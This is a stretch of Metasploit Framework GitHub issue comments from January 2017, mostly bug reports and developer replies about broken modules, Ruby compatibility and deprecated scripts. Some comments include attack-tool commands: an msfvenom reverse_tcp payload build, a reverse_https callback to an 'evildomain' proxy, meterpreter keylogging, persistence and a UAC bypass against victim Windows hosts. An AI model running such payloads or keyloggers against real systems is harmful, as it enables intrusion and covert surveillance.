[2017-01-15 07:31] wvu-r7 commented on #7828
What?

[2017-01-15 07:42] hktalent commented on #7828
workspace hosts count Number services count  Number
php             30                               3232
szswdx       332                             3435333

[2017-01-15 07:50] wvu-r7 commented on #7828
Ah, I see.

[2017-01-15 23:50] xxxcrow opened #7831 "shell by metasploit and meterpreter show "symbols""
language of victim system is russian
http://image.prntscr.com/image/d7eb5f41eec94ee08d07422ae37a1700.png

[2017-01-16 00:03] wvu-r7 commented on #7831
cc @bwatters-r7

[2017-01-16 00:07] OJ commented on #7831
This is a known issue. Channelised stuff knows nothing about unicode/encoding/etc. It just shuffles bytes back and forth. I looked into this a while ago and I can't remember what roadblock I hit.

This is going to be painful to fix, FYI!

[2017-01-16 00:31] #7831 closed

[2017-01-16 03:08] #7828 closed

[2017-01-16 12:26] wneessen commented on #7814
I ran into the same issue. Just upgraded my Arch to the latest build with Ruby 2.4 getting the activesupport Gem to fail with latest metasploit-framework (bleeding edge). Any workaround (that doesn't invole installing some older Ruby packages via AUR)?

Any suggestion is appraciated!

[2017-01-16 12:44] anthraxx commented on #7814
@wneessen you can give a test with this PR https://patch-diff.githubusercontent.com/raw/rapid7/metasploit-framework/pull/7819.patch but it may still contain problems... be an early tester and report issues back to the PR :smiley_cat:

[2017-01-17 05:35] hipcrime opened #7837 "NoMethodError in AutoPwn2"
## Steps to reproduce

How'd you do it?

1. use auxiliary/server/browser_autopwn2
2. run

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?

AutoPwn2 should run.

## Current behavior

What happens instead?

msf

[2017-01-17 10:09] wvu-r7 commented on #7837
Broken as of #7811.

[2017-01-17 10:47] wvu-r7 commented on #7837
38a4c2aa971ed438456160154a4f8d6b201d95fd in #7811.

[2017-01-17 18:00] #7837 closed

[2017-01-17 19:13] bwatters-r7 commented on #7813
It appears to work for me:
[code]

What payload are you using, and can you tell us anything about the target?  I used a Vista SP1 x86 install without any updates.

[2017-01-17 19:15] bwatters-r7 commented on #7813
FYI, I am using commit ed435cad639d8dc8fc2671f77e017e2ac5a28fc0 on:
[code]

[2017-01-18 14:35] mame82 opened #7841 "Feature request: "OverrideScheme" option for android reverse_http(s)"
I tried to setup the following scenario for a mobile security talk:

- android/reverse_https payload connects back to a public server (https://evildomain:443)
- public server runs a reverse_proxy which redirects traffic to itself (https://127.0.0.1:4444)
- reverse proxy on https://evildomain:443 terminates the first SSL connection with a valid cert (letsencrypt)
- one of several kali hosts should

[2017-01-18 15:06] barnesk opened #7842 "browser_autopwn2 - NoMethodError undefined method `[]' for nil:NilClass"
## Steps to reproduce
use auxiliary/server/browser_autopwn2
run

## Output:
[*] Auxiliary module execution completed
[*] Searching BES exploits, please wait...
[*] Starting exploit modules...
[-] Auxiliary failed: NoMethodError undefined method `[]' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/browser_autopwn2.rb:130:in `set_exploit_options'
[-]   /us

[2017-01-18 15:49] bwatters-r7 commented on #7842
Was this fixed by https://github.com/rapid7/metasploit-framework/pull/7838 ?

[2017-01-18 16:06] barnesk commented on #7842
It might. I looked to see if anyone had already reported the problem, but
apparently I'm unfamiliar enough with the reporting interface that I missed
#7837. I searched on browser_autopwn2 instead of just autopwn2, that's why
I reported it myself.

If it is the fix it hasn't hit the kali repositories yet.  I tried an
update this morning and metasploit wasn't one of the updates. I check it
again lat

[2017-01-18 16:15] busterb commented on #7842
We need to cut a new framework release if we want Kali to pick it up. These happen automatically at noon CST on Fridays.

[2017-01-18 16:59] busterb commented on #7842
Going to close this for now, since we already fixed it.

[2017-01-18 16:59] #7842 closed

[2017-01-18 16:59] boomtnt46 commented on #7617
Same with WhatsApp Beta apk.
(I am using Linux Mint 18.1).
![snapshot22](https://cloud.githubusercontent.com/assets/8796790/22074214/e7265638-dda7-11e6-9456-058baff4a8c0.png)

[2017-01-18 17:06] busterb commented on #7617
Do any of you guys have 'zipalign' in your path?

[2017-01-18 17:12] boomtnt46 commented on #7617
I do.

[2017-01-19 21:24] jinq102030 opened #7849 "Confusing error when running module auxiliary/scanner/http/ipboard_login"
## Steps to reproduce

How'd you do it?

1. `use auxiliary/scanner/http/ipboard_login`
2. `set RHOST 127.0.0.1`
3.  got the following error when all the HTTP requests were responded
[code]
It should have given more appropriate error.   Thanks to @wchen-r7, who pointed out the actual error should have been:  ```Server nonce not present, potentially not an IP Board install or bad URI."```

[2017-01-20 03:03] timwr commented on #7841
I (perhaps prematurely) think I follow what's happening here.

[2017-01-20 03:10] timwr commented on #7841
It sounds like you need `set payload android/meterpreter/reverse_http`, `set OverrideScheme https`, and the latter added.

[2017-01-20 03:54] #7849 closed

[2017-01-20 10:29] ichensky opened #7851 "."

[2017-01-20 10:34] ver007 commented on #5622
This is the result of double clicking the left list of armitage

[2017-01-20 11:00] h00die commented on #5622
's/Cobalt strike/armitage/'

[2017-01-20 14:23] mame82 commented on #7841
Yes, "OverrideScheme" option is exactly what I'm asking for!

[2017-01-20 14:58] 0x41414141 commented on #6754
I plan on merging this at some point. See if this works for you:

https://github.com/rapid7/metasploit-framework/compare/master...0x41414141:java_serialize_jboss_multi?expand=1

[2017-01-20 15:26] #7851 closed

[2017-01-20 19:06] jmartin-r7 opened #7853 "Framework Meterpreter packet inspect() fails"
## Steps to reproduce

1. call inspect() on any tlv packet with non-meta Type > 403

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

The inspect function should complete without raising an exception.

## Current behavior

"uninit

[2017-01-20 20:09] jinq102030 opened #7854 "The joomla_plugins module has some code that's strange"
Saw the following code in joomla_plugins module.   It's strange to require the size of ```res.body``` to change after ```res.body.gsub!(/[\r|\n]/, ' ')```

[code]
Thanks to @wchen-r7 to confirm this suspicion.

[2017-01-20 20:13] wvu-r7 commented on #7854
That is strange. Looks wrong.

[2017-01-20 21:47] dcmetts commented on #7813
i am also having this issue but i am running the rolling kali 64

[2017-01-20 21:51] bwatters-r7 commented on #7813
Can you give any more information on the target's OS?  (Patch level, version, etc?)

[2017-01-20 22:45] dcmetts commented on #7813
OS details: Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1

[2017-01-20 22:46] dcmetts commented on #7813
thats from the nmap scan. its vista business sp1

[2017-01-20 22:58] h00die commented on #7813
Good luck @bwatters-r7!

[2017-01-20 23:10] dcmetts commented on #7813
vista business sp1 with server 2008

[2017-01-20 23:16] jinq102030 opened #7855 "Not sure what the module "auxiliary/scanner/http/lucky_punch" does"
## Steps to reproduce

It appears that this module just sends a request and not does any processing on the response.   Wonder if something is wrong here.

[2017-01-20 23:19] pbarry-r7 commented on #7855
This might shed some light...?

https://dev.metasploit.com/pipermail/framework/2009-April/004502.html

[2017-01-20 23:23] h00die commented on #7855
I'm finishing up a tomcat doc tonight , maybe I'll see about working on some docs for this next

[2017-01-20 23:24] jinq102030 commented on #7855
Thanks @pbarry-r7 for the link. It's an interesting read. But I still don't get it why the module send the request and not check the response.

[2017-01-20 23:27] jinq102030 commented on #7855
@h00die, looking forward to seeing your doc on this.  Have a good weekend.

[2017-01-21 01:31] pbarry-r7 commented on #7855
So the title of this issue and the verbiage in the description seem to be saying different things:

- "What does this module do?" (title)
- "Why doesn't it check the response to the message it sent?" (description)

In answer to the first question, it appears this module uses an SQL injection to force a XSS attack that will send the target's browser to a URL endpoint controlled by the attacker (and

[2017-01-21 03:07] #7757 closed

[2017-01-21 03:46] wvu-r7 commented on #7855
That's some good handwaving, @pbarry-r7.

[2017-01-21 03:50] wvu-r7 commented on #7855
I would remove `normalres`, personally. The response depends entirely on the app. It's a generic/mass SQLi for ~reasons~.

[2017-01-21 03:51] wvu-r7 commented on #7855
I would remove `normalres`, personally. The response depends entirely on the app. It's a generic/mass SQLi and an aux/scanner for good reason.

[2017-01-21 05:24] 765uyg commented on #7813
@bwatters-r7  There is no _[*] Sending stage (957487 bytes) to <VistaSP1x86_IP>_ of this code, and the _packet (930 bytes)_ is the _packet (872 bytes)_, to see the _ms09_050_smb2_negotiate_func_index.rb_, as if the lack of the code to _Sending stage ... to ..._, I would like to ask where you can learn, thank you

[2017-01-21 07:59] timwr commented on #7841
@mame82 are you able to test https://github.com/rapid7/metasploit-framework/issues/7860 ?
If not I can give it a go myself. The change seems reasonable but there could be all kinds of craziness that prevents it from working/breaks everything.

[2017-01-21 08:23] mame82 commented on #7841
Wow, that was fast. Unfortunately I'm have to wait till next week for testing

[2017-01-22 00:05] busterb commented on #7813
Can one of you please log into your Windows target, go to a cmd prompt, and run: `systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"`

For instance, on my system, it looks like this:
[code]

The paste the output, verbatim, here.

[2017-01-22 00:21] vysec commented on #7813
My boss will do it on Monday. We tried it on MSDN image Windows 2008 SP1 with no patches installed.
M

[2017-01-22 00:22] vysec commented on #7813
Might want to add that it was 32 bit.

[2017-01-22 10:01] ChristianSch opened #7861 "uninitialized constant Rex::Text (NameError)"
When opening metasploit via `msfconsole` I get the following error:
[code]

Note: before the update everything was fine, I even did a clean install just before the update.
If you need something, say something. I'm glad to help.

## meta
* macOS Sierra
* installed via sources (`v4.13.16`)
* `ruby 2.4.0p0 (2016-12-24 revision 57164) [x86_64-darwin16]`

## full dump
[code]

[2017-01-22 14:17] busterb commented on #7861
Thanks, looking now.

[2017-01-22 14:19] busterb commented on #7861
Hmm, I'm a little confused about your description. It says you installed from source, but the error is clearly from the omnibus installer.

Can you please actually show how you invoked msfconsole, and what directory you did it from?

[2017-01-22 14:24] busterb commented on #7861
I'm going to guess that you installed a really old version of the omnibus package, and have entirely forgotten about it, since the files referred to above haven't existed in that location for months.

I'd recommend running 'msfupdate' from the omnibus package to upgrade it (it should be warning you if you're > 2 weeks out of date anyway). Or if you don't actually want to use it, just run 'msfremov

[2017-01-22 17:08] #7853 closed

[2017-01-22 21:48] #7617 closed

[2017-01-22 21:48] #7725 closed

[2017-01-23 08:35] ChristianSch commented on #7861
Regarding the invoking of `msfconsole`, it does not matter where I invoke it.

I think you are right indeed, I seem to have an older installation laying around somewhere. The new install actually went to `/usr/local/share/` (according to this [guide](http://www.darkoperator.com/installing-metasploit-framewor/)), and `/opt/metasploit-framework/` seems to be the old one. The new msfconsole gives me

[2017-01-23 08:42] busterb commented on #7861
I actually would not recommend following that guide because it will currently lead to a broken install since Ruby 2.4 is not ready yet, see #7819. Instead, please run this if it is on your system (sounds like it is):

/opt/metasploit-framework/bin/msfupdate

or just grab the latest package here: http://osx.metasploit.com/

This is much, much simpler, includes everything you need (database, correct

[2017-01-23 08:45] busterb commented on #7861
I'm going to close this since this is more of a support issue rather than a bug in metasploit-framework.

[2017-01-23 08:45] #7861 closed

[2017-01-23 10:04] ChristianSch commented on #7861
Thanks a bunch for your help and time!

[2017-01-23 14:13] mame82 commented on #7841
@timwr I have to apologize

I tried to test your PR but no chance. I'm using kali rolling and I'm not able to compile metasploit-framework from your repo (override_scheme branch).

The cause is that the pre-installed version of OpenSSL 1.1.0 conflicts with ruby-2.3.3  which is needed to run metasploit (needs downgrade to OpenSSL 1.0.172). I'm running out of time to do meaningful test this week.

I

[2017-01-23 15:14] mame82 commented on #7841
Unfortunatly this didn't worked out.

Your part of the code is working. I tested this by adding
`print_status("#{callback_scheme}://#{callback_host}:#{callback_port}")`

before return of the method
`def payload_uri(req=nil)`

The payload URI generated is indeed **https**://evildomain

But all sessions die as "invalid"

Further inspecting the http traffic with tcpdump on the proxy, I recognized tha

[2017-01-23 15:42] jinq102030 commented on #7855
Thanks @pbarry-r7 for the good writeup.  @wvu-r7 mentioned it's a generic SQLi, wonder if it's ok to make a HTTP request to pull in HTML+Javascript (with injected code) for illustration purpose?

[2017-01-23 17:34] crackmeifyoucan opened #7864 "Problem upon startup.. with lib/msf/ui/console/command_dispatcher/creds.rb"
## Steps to reproduce

Upon startup...

./msfconsole
/var/lib/gems/2.1.0/gems/activesupport-4.2.7.1/lib/active_support/dependencies.rb:274:in `require': /metasploit-framework/lib/msf/ui/console/command_dispatcher/creds.rb:134: syntax error, unexpected ':', expecting => (SyntaxError)
      'ssh-key':    'Private, private_type SS...
                ^
/metasploit-framework/lib/msf/ui/console/command_

[2017-01-23 17:37] hdm commented on #7864
Your ruby version is not supported, please upgrade to 2.3.1

[2017-01-23 17:37] #7864 closed

[2017-01-23 19:02] lvpasquier opened #7865 "ushi"
## Steps to reproduce

How'd you do it?

1. ...
2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?

## Current behavior

What happens instead?

You might also want to check the last ~1k lines of
`/opt/met

[2017-01-23 19:17] busterb commented on #7865
?

[2017-01-23 19:17] #7865 closed

[2017-01-23 20:09] #7679 closed

[2017-01-23 22:00] bwatters-r7 commented on #7813
OK; I ran this against Windows 2008 SP1 and SP2, and I was 2/3 on success.  Not sure why it failed the one time.  After a reboot and retry it worked fine.  (The failure caused a crash on the server)

## Win 2008x86 SP1

[code]
## Win 2008x86 SP2 Failure

[code]
![image](https://cloud.githubusercontent.com/assets/17987018/22224417/2b4ffd16-e184-11e6-8887-1024b17ec5c9.png)

Win 2008 x86 SP2 Success

[2017-01-24 14:30] wwebb-r7 opened #7867 "Create Cisco WebEx Chrome Extension 1.0.1 RCE Module"
Nothing to see

Work in progress

This is regarding the vuln detailed [here](https://bugs.chromium.org/p/project-zero/issues/detail?id=1096)

[2017-01-24 15:33] wwebb-r7 commented on #7637
Resolved by [https://github.com/rapid7/metasploit-framework/pull/7852](https://github.com/rapid7/metasploit-framework/pull/7852)

[2017-01-24 15:33] #7637 closed

[2017-01-24 17:55] vysec commented on #7813
What did you install your image from? Ours was from msdn

[2017-01-24 18:47] vysec commented on #7813
OS Name: Microsoftr Windows Serverr 2008 Standard
OS Version: 6.0.6002 Service Pack 2 Build 6002
System Type: X86-based PC

SP1 and SP0 didn't work either.

[2017-01-24 18:48] vysec commented on #7813
Tested also on Core and Full Versions. All from MSDN

[2017-01-24 18:50] vysec commented on #7813
Is there a secret Windows patch against ms09-050 that I am not aware of? That's partially pushed to MSDN ISOs? I mean it's partial because it still BSODs so it's not a full patch if so.

[2017-01-24 20:58] bwatters-r7 commented on #7813
Installed from MSDN images:
en_windows_server_2008_with_sp2_x86_dvd_342333.iso
[code]
en_windows_server_2008_x86_dvd_x14-26710.iso
[code]

[2017-01-25 02:05] wvu-r7 commented on #7867
Oh, I thought this was a PR.

[2017-01-25 02:05] wvu-r7 commented on #7855
Not a bad idea to have it verify the injection **optionally**. :)

[2017-01-25 03:13] jinq102030 commented on #7855
Agree. Maybe add a new option called VERIFY_INJECTION, default to be false.

[2017-01-25 15:31] vysec commented on #7813
not sure how we can assist further. I mean it's probably closable. We can't exploit it. We've tried VirtualBox vs VMWare, we thought it may be the virtualisation.

[2017-01-25 15:33] vysec commented on #7813
Even used Piotr's C based exploit

[2017-01-25 15:34] bwatters-r7 commented on #7800
I looked into this briefly; can you give me more information?
(1) How are you using the exploit- are you emailing, using a share, or USB?
(2) What is the architecture of the Windows 7 target?
(3) What payload are you using?

[2017-01-25 17:35] egypt commented on #7867
So when you say work in progress, does that mean you're working on it? Assigning you based on that assumption.

[2017-01-25 17:39] wvu-r7 commented on #7867
Yes, it's currently under development.

[2017-01-25 21:05] fiddeg commented on #7264
This was very helpful. Thanks

[2017-01-26 00:33] wwebb-r7 commented on #7867
It's developed

[2017-01-26 00:53] wvu-r7 commented on #7867
Damn you, @wwebb-r7. I knew but clicked anyway.

[2017-01-26 13:13] ichensky opened #7872 "Keylogger . Capture keys, but not all pressed."
## Steps to reproduce

If quickly press keys , keyloger will  not capture them.
1. $ keyscan_start
2. Enter in Windows window any keys quickly.
3. $ keyscan_dump

## System stuff
Seems that error appeares somewhere here:
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/capture/lockout_keylogger.rb
### Metasploit version
4.12.22-dev

[2017-01-26 14:09] 765uyg commented on #7800
@bwatters-r7 (1) I may have made a mistake at this point，sorry.
But "include Msf::Exploit::Remote::SMB::Server::Share"  really can not import, I was using the import of the "include Msf::Exploit::Remote::SMB”, may have been wrong, but I can not find the reason

(2)If I don't get it wrong, you're asking what the target system is. Goal is windows server 2008,oh,my god,I seem to confuse windows serve

[2017-01-26 19:40] wwebb-r7 commented on #7867
Whether it's ever landed or not, this is resolved by [https://github.com/rapid7/metasploit-framework/pull/7871](https://github.com/rapid7/metasploit-framework/pull/7871)

[2017-01-26 19:40] #7867 closed

[2017-01-26 19:54] bwatters-r7 commented on #7872
It works for me locally, but can you give some more information because it might be that I'm not doing a good enough job at replicating your situation.

(1) What type of payload are you using?  In my test I used windows/x64/meterpreter/reverse_tcp.
(2) What is the Operating system on the target OS (The one you want to capture keys on)  In my test, it was WIndows 10 x64 Pro (You can run sysinfo at

[2017-01-26 20:02] mark-r-stevens opened #7875 "incorrect path to persistence.rb"
## Steps to reproduce

How'd you do it?

1. run persistence -h

line 82 in: lib/msf/base/sessions/scriptable.rb refers to incorrect script.

79          'metsvc' => 'post/windows/manage/persistence_exe',
80	      'migrate' => 'post/windows/manage/migrate',
…
81	      'packetrecorder' => 'post/windows/manage/rpcapd_start',
82	      'persistence' => 'post/window/manager/persistence_exe',

### I inst

[2017-01-26 20:04] wwebb-r7 commented on #7872
It looks as if the keylogger algo in metasploit-payloads is based on GetAsyncKeyState(), which IIRC will miss keys in a few different scenarios - like pressing them very rapidly.

Granted I haven't kept up with or thought key logging in a long while, I'd think a filter driver would be the only way to ensure that no keys are missed.  It's worth looking into in my opinion.

[2017-01-26 20:38] bwatters-r7 commented on #7875
Well, that is a bug, but I think there might be more.  When I correct that character, I get:
[code]

I may be testing it incorrectly, though.  Certainly, at the very least, we need to lose that 'r', though.  Calling @wvu and @bcook-r7 for some clarification of behavior.

[2017-01-26 20:51] wvu-r7 commented on #7875
Hi.

[2017-01-26 21:29] mark-r-stevens commented on #7875
I also get the wrong number of arguments when I make the change.

[2017-01-26 22:23] wvu-r7 commented on #7875
Is there a reason you're using the Meterpreter script instead of a post module or local exploit?

[2017-01-27 11:17] ichensky commented on #7872
Seems that meterpreter payload call GetAsyncKeyState  every 30 ms. Another possible scenario, when this function will not work properly, from msdn: "another application can call GetAsyncKeyState and receive the "recently pressed" bit instead of your application", so if one application already use this function, other applications can never receive result.
Like another variant,  keylogger is inject

[2017-01-27 12:02] alimp5 opened #7878 "Pre-order and Post-order results of executed meterpreter CMD in Python-MSFRPC"
Hi Metasploit development team,

I'm using below Lib for interacting with Metasploit:
https://github.com/SpiderLabs/msfrpc/tree/master/python-msfrpc

When I pass a CMD via "session.meterpreter_run_single" to a specific session in python, for the first one, the result is OK. but when I change the CMD and pass to metasploit via RPC, I will get result of previous CMD; So I should run again the above

[2017-01-27 12:04] alimp5 commented on #7878
root@kali:~# msfconsole --version
Framework Version: 4.13.14-dev

[2017-01-27 12:21] alimp5 opened #7879 "fetch and use the value of PayloadUUIDxx (xx like as PayloadUUIDRaw) in MSF-RPC"
Hi Metasploit development team,

I used below commands and parameters:
First:
root@kali: msfvenom -p windows/meterpreter/reverse_tcp_uuid LHOST=192.168.1.20 LPORT=4444 PayloadUUIDTracking=true PayloadUUIDRaw=0011223344556677 ....................

Second:
root@kali: cat msgRPC.rc:
load msgrpc User=msf Pass='456789'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_uuid
set Initi

[2017-01-27 13:10] alimp5 commented on #7879
Also, after gaining access,, I cant see and find this UUID(E.x: 0011223344556677) value in  **.msf4/payloads.json**

[2017-01-27 14:13] zero77 opened #7880 "Android Public RCE Exploit Requests"
Can you please add these public android remote code execution exploits.
I have posted the CVE and android versions that are affected and the link to the proof of concept code and modules.

CVE-2016-6707 - https://en.0day.today/exploit/26479 affected Android versions 6.0, 6.0.1, 7.0

CVE-2015-1538 - https://en.0day.today/exploit/24222 affected Android versions 5.1

CVE-2016-6754 - https://en.0day.t

[2017-01-27 14:23] h00die commented on #7880
Developers typically have VERY long to do lists. Feel free to take on any of these yourself and submit the PRs!

[2017-01-27 14:29] mark-r-stevens commented on #7875
Probably user error.

1. Using version 4.13.14-dev on Kali 2. typed following commands and worked:
msf> session -i 2
msf> run persistence -h

get back help.

2. run msfupdate to latest version
msf> session -i 2
msf> run persistence -h

get error on path to script not found. change path error, get error on number of arguments.

Perhaps I was using persistence wrong all along?

[2017-01-27 14:29] mark-r-stevens commented on #7875
Probably user error. 1. Using version 4.13.14-dev on Kali 2. typed following commands and worked:msf> session -i 2msf> run persistence -hget back help.2. run msfupdate to latest versionmsf> session -i 2msf> run persistence -hget error on path to script not found. change path error, get error on number of arguments.Perhaps I was using persistence wrong all along?On Jan 26, 2017, at 5:24 PM, wvu-r7

[2017-01-27 14:31] wwebb-r7 commented on #7872
After poking around, it looks like the state-of-the-art in usermode keyloggers is [the raw input API](https://msdn.microsoft.com/en-us/library/windows/desktop/ms645536(v=vs.85).aspx) - state-of-the-art since Windows XP at least.  My two or three google searches worth of research seem to indicate that an application using this API for key logging will **not** miss any input.  I'll have to read up o

[2017-01-27 14:59] wwebb-r7 commented on #7880
Well, this is certainly more manageable than your [last request](https://github.com/rapid7/metasploit-framework/issues/7197), and by manageable I mean months worth of work.

[2017-01-27 15:27] wvu-r7 commented on #7880
Thanks for the list. We'll take it under advisement, but we can't leave this open as a to-do. Patches welcome!

[2017-01-27 15:27] #7880 closed

[2017-01-27 15:29] #6383 closed

[2017-01-27 15:29] #7216 closed

[2017-01-27 15:35] wvu-r7 commented on #7875
No, I mean a module like `exploit/windows/local/persistence`. When you do `run persistence`, you're running the script. Scripts have been deprecated for literally years. :)

[2017-01-27 15:54] mark-r-stevens commented on #7875
I will give that a try. The internet is out of date :)

[2017-01-27 15:55] wvu-r7 commented on #7875
It sure is! Take a look at #7823 if you will. I'm fixing this as we speak.

[2017-01-27 15:55] vysec opened #7881 "MSF launch errors"
## Steps to reproduce

How'd you do it?

[code]

## Expected behavior

Open

## Current behavior

Errors

## System stuff

### Metasploit version

Latest clone just now

### I installed Metasploit with:
Git clone
### OS

What OS are you running Metasploit on?

Kali Sana

[2017-01-27 16:34] bwatters-r7 commented on #7881
This is a shot in the dark, but what version of Ruby do you have installed?

[2017-01-27 17:08] darkbushido commented on #7881
if we are going to keep supporting older versions of ruby we should add them to the travis-ci build list.
its a small change to make this 2.1 compatible if we want to do that?

[2017-01-27 17:21] busterb commented on #7875
Where on the internet did you get the advice? I think we should probably throw a big fat message up when someone uses meterpreter script these days, and try to get ancient blogs and training updated to the new method.

[2017-01-27 17:39] mark-r-stevens commented on #7875
googled metasploit persistence. This was the first page that came up:

https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/

[2017-01-27 18:19] #7881 closed

[2017-01-27 23:34] kkar opened #7885 "meterpreter_reverse_https predefined proxy?"
Is there any possibility to route the stageless reverse https payload (windows/meterpreter_reverse_https), through a pre-defined SOCKS proxy? If not, are there any wayarrounds on this?

[2017-01-28 03:13] 765uyg commented on #7800
I've learned something from Wiki, but I still need to learn more about details and specific practice

[2017-01-28 03:28] 765uyg commented on #7813
@vysec Can you tell me the iso specific download link, I can not find the search MSDN

[2017-01-28 03:36] OJ commented on #7885
Yes, look at the proxy options.

On Jan 28, 2017 9:34 AM, "Konstantinos Karakatsoulis" <
notifications@github.com> wrote:

[2017-01-28 12:51] Ulloreel opened #7886 "bypassuac_eventvwr Exploit failed: NoMethodError undefined method `first' for nil:NilClass"
## Steps to reproduce

## How'd you do it?

Using Kali rolling 2016.1
got metasploit from apt-get install metasploit-framework
got  meterpreter session with windows/meterpreter/reverse_tcp payload
tried to escalate privileges but failed

victim:
windows 10 pro 64bit

## Expected behavior

What should happen is, exploit/windows/local/bypassuac_eventvwr should create a new session where i could get

[2017-01-28 13:31] lexlutorr commented on #7886
this , having the same problem with the new version dont know why , just downgrade version and problem solved, problem may be with some ruby package because the code of the bypass_event.rb is exactly the same

[2017-01-28 13:40] Ulloreel commented on #7886
What was the latest version you got it to work with?
I also tried it with 4.11.7 (Which i dont understand why is it not named 4.11.28 dev) from here:
https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version
still got an error, should i try even older?

[2017-01-28 14:32] lexlutorr commented on #7886
https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

navigate to that link and donwload version metasploit 4.12.0 second in the list

should work perfectly

[2017-01-28 14:59] Ulloreel commented on #7886
Works very well now. Thank you!

PS!. If any metasploit dev is looking at this, please consider fixing it :)
And.. add support to different scripts in new version releases, i cant even use vnc.

[2017-01-28 15:25] h00die commented on #7855
@efraintorres looks to be absent on git, however, why doesn't someone reach out to him on twitter and see if he could look back to some notes and see if he has a) a vuln app still, b) a link to some of the docs/articles explaining.
https://twitter.com/etlow

This may shed some light if we can find background on what was being exploited that this seeks to replicate!

[2017-01-28 19:22] johnguy5 commented on #7867
Cisco just announced more affected plugins, versions and browsers

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex

[2017-01-28 20:47] kkar commented on #7885
I'm sorry, but I am unable to find any "proxy" option for "windows/meterpreter_reverse_https", even with "show advanced".

[2017-01-29 00:56] OJ commented on #7885
`PayloadProxyHost`, `PayloadProxyType`, etc.

On Jan 29, 2017 06:47, "Konstantinos Karakatsoulis" <
notifications@github.com> wrote:

I'm sorry, but I am unable to find any "proxy" option for
"windows/meterpreter_reverse_https", even with "show advanced".

—
You are receiving this because you commented.

Reply to this email directly, view it on GitHub
<https://github.com/rapid7/metasploit-framewor

[2017-01-29 09:11] timwr commented on #7841
I think it's because the transport config that gets return is still http. Maybe you can try changing this:
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/transport_config.rb#L54
to `https`. I'm not sure of the best way to fix it properly though.

[2017-01-29 18:19] ulusher commented on #6809
![helpme](https://cloud.githubusercontent.com/assets/22099795/22406693/27ae04ba-e660-11e6-8792-bd956641ab0f.png)

Don't fix mine :/

[2017-01-29 18:47] h00die commented on #6809
It would be helpful to include which version you are using to ensure yours has the patch applied.  I believe, and don't quote me, only the git clone version has the patch at this point, as a release including this hasn't happened yet

[2017-01-29 19:38] ulusher commented on #6809
Yeah, I fixed some errors.(While I writing "run persistence" meterpreter give "script doesn't found.". I fixed from "sciptable.rb" for some little wrong word.) But I have such an error :/
If I'll remove metasploit-framework and after if I'll install from github then is it fix? Does anyone knows?

[2017-01-29 19:40] h00die commented on #6809
Scripts are deprecated, run the local module

[2017-01-29 19:44] ulusher commented on #6809
wow :0
How can I run local module "persistence"?

[2017-01-29 19:45] h00die commented on #6809
This isn't a support forum, it's for reporting bugs. Ask in IRC, search the web, or browse the local windows modules

[2017-01-29 19:45] wvu-r7 commented on #6809
Agh, let me push what I have.

[2017-01-29 19:50] ulusher commented on #6809
I already reported. I already asked the rapid7. Thanks for your interest.

[2017-01-29 19:52] ulusher commented on #6809
:) @wvu-r7. OK. Is the bug solved?

[2017-01-29 20:01] wvu-r7 commented on #6809
@ulusher: It will be soon.

[2017-01-29 20:09] ulusher commented on #6809
@wvu-r7 Well. Is there such a problem in Pro version?

[2017-01-29 20:19] wvu-r7 commented on #6809
See #7887.

[2017-01-29 21:39] OJ commented on #6809
It's definitely time we put a proper nail in the coffin of those scripts. Is the `run` command used for anything other that Meterp scripts inside of Meterp? If not, perhaps we should put a warning in there saying "What you're doing isn't supported"?

[2017-01-29 21:42] OJ commented on #7886
@Ulloreel scripts are deprecated. And yes, MSF devs are constantly paying attention, it's what we do.

So you're saying that the exploit in latest version is working, or not?

[2017-01-29 21:57] h00die commented on #6809
Yea, i'm thinking something like #7887 https://github.com/wvu-r7/metasploit-framework/blob/b44e7ff73344c00bcb20a705f6ddb9a55fd80e78/lib/msf/base/sessions/scriptable.rb#L107 will do quite nicely

[2017-01-29 21:59] Ulloreel commented on #7886
Yeah it didnt work for me with 4.13.
4.12 should be fine.

[2017-01-29 22:02] OJ commented on #7886
Thanks, confirmed broken. Working on a solution.

[2017-01-29 22:09] kkar commented on #7885
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter_reverse_https):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accep

[2017-01-29 22:55] OJ commented on #7886
It seems to be related to @dmaloney-r7's work adding auto targets to exploits, see here: https://github.com/rapid7/metasploit-framework/commits/master/lib/msf/core/exploit.rb

Hey @dmaloney-r7 there are a bunch of exploits, this one included, that break as a result of adding this automatic target. Do we now need to go through each exploit and make sure it handles this new case correctly?

[2017-01-29 22:59] OJ commented on #7886
@Ulloreel The short term work around for this is to manually set the `TARGET` for your exploit. `set TARGET 1` for x86, and `set TARGET 2` for x64 (and make sure your chosen payload architecture matches.

[2017-01-30 01:18] busterb commented on #7886
I'll grab this for an intermediate-term fix. Going to chat with @dmaloney-r7 tomorrow to see if there is an even better way to do this.

[2017-01-30 11:19] madmike33 opened #7890 "Module Request {WordPress 3.5-4.7.1 - WP_Query SQL Injection}"
Wordrepss suffers from SQL in WP_Query table it would be nice if it exists in MSF
1- https://wpvulndb.com/vulnerabilities/8730
2- https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
3- https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb

[2017-01-30 13:02] rkachowski opened #7891 "feature request: populate hosts table with db_nmap script output"
In the current db_nmap implementation (as of 0388c02) db_nmap doesn't populate the hosts table with information discovered from nse scripts and instead bundles all the output into the notes table where it stored as string data.

